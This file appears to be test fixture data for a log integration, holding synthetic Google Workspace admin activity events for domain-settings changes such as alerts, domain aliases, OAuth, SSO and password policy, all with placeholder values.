-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_LOCALIZATION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VIEW_DNS_LOGIN_DETAILS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_LOCALE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_DEFAULT_TIMEZONE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_PRE_RELEASE_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_DOMAIN_SUPPORT_MESSAGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_TRUSTED_DOMAINS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EDU_TYPE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSO_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_SSL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"INFO_TYPE","value":"ADDRESS"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_TRANSFER_TOKEN"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BACKGROUND_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_BORDER_COLOR","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} 